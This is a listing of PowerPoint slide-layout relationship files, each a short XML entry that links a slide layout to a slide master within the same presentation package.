<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster227.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2269.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster227.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout227.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270.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster227.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2271.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2272.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2273.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2274.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2275.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2276.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2277.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2278.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2279.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout228.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280.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster228.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2281.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2282.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2283.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2284.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2285.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2286.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2287.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2288.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2289.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout229.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290.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster229.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2291.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2292.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2293.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2294.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2295.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2296.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2297.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2298.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2299.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.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30.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300.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster230.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2301.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2302.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2303.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2304.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2305.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2306.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2307.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2308.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2309.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout231.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310.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster231.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2311.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2312.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2313.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2314.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2315.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2316.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2317.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2318.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2319.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout232.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320.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster232.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2321.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2322.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2323.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2324.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2325.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2326.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2327.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2328.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2329.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout233.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330.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster233.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2331.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2332.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2333.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2334.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2335.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2336.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2337.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2338.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2339.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout234.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340.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster234.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2341.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2342.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2343.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2344.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2345.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2346.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2347.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2348.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2349.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout235.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350.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster235.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2351.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster236.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2352.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster236.xml"/></Relationships>
</file>

